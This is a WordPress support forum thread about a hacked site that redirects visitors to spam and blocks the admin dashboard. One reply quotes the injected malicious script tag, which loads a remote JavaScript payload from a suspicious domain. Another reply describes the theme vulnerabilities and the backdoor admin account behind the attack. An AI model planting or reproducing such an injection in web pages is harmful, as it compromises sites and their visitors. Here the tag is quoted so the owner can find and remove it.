Support » Fixing WordPress » Redirect Virus is not allowing me to get in the back end of my site

  • wixeytaylor

    (@wixeytaylor)


    A redirect virus has taken over my site and is infecting all of my site visitors. It redirects you to a page that seems like it needs you to verify that you are not a robot by clicking “allow” when really you are giving it permission to spam you.

    With an ad blocker I can see the site, but when I log in and try to go to my dashboard (or any other pages) it says there is a web error.

    None of the forums have been able to help and there is no support line or chat at wordpress, which is frustrating because this is an immediate issue.

    The page I need help with: [log in to see the link]

Viewing 9 replies - 1 through 9 (of 9 total)
  • m0ze

    (@m0ze)

    wixeytaylor, hi there.

    None of the forums have been able to help and there is no support line or chat at wordpress, which is frustrating because this is an immediate issue.

    So what’s your question then?

    Good starting point is to find and delete the script injection:

    <script src='https://stick.travelinskydream.ga/analytics.js?s=07&b=345&cid=7457-85-2346788-24' type='text/javascript'></script>

    You have it on each page of your website.

    m0ze

    (@m0ze)

    wixeytaylor, if you’re interested, here is an additional information about your issue:

    0 – you are using an extremely outdated version of the premium FocusBlog theme by Thrive Themes – v1.406, while latest release is v1.97 (July 8, 2015);
    1 – this theme is not supported by the developer, so the code is outdated too;
    2 – most important part – up to v1.97 this theme have two vulnerabilities w/o fix – Unauthenticated Arbitrary File Upload and Option Deletion (CVSS v3 Score is 10 == critical);
    —-
    3 – the injected script creates an additional privileged user in the system and changes the data in the database (%_options table).

    So, if you want to get rid of the malware and backdoor, you first need to close your website from visitors, delete the vulnerable theme and bundled plugins by the same developer, and then start cleaning your website.

    mavridis

    (@mavridis)

    @m0ze has some good tips but cleaning up a hacked site is a tedious procedure, especially for someone without experience. If you decide to clean it up yourself, there are plenty of step-by-step guides on the basics:

    Good luck and always keep your themes and plugins updated!

    Thread Starter wixeytaylor

    (@wixeytaylor)

    I contacted the hosting site who cleaned the code but I still can’t access the back end of my wordpress dashboard. Any ideas?

    wixeytaylor,

    Any ideas?

    Can you be more specific? What’s going on while you’re trying to access the dashboard?

    Thread Starter wixeytaylor

    (@wixeytaylor)

    When I try to access the dashboard (http://www.micresource.com/wp-admin/), this is what pops up:

    This page isn’t working
    http://www.micresource.com is currently unable to handle this request.
    HTTP ERROR 500

    wixeytaylor,

    HTTP ERROR 500

    Check the PHP error log, there will be a specific fatal error caused this issue.

    Thread Starter wixeytaylor

    (@wixeytaylor)

    How do I do that?

    wixeytaylor, the fastest way would be to ask about this the technical support of your hosting.

Viewing 9 replies - 1 through 9 (of 9 total)
  • You must be logged in to reply to this topic.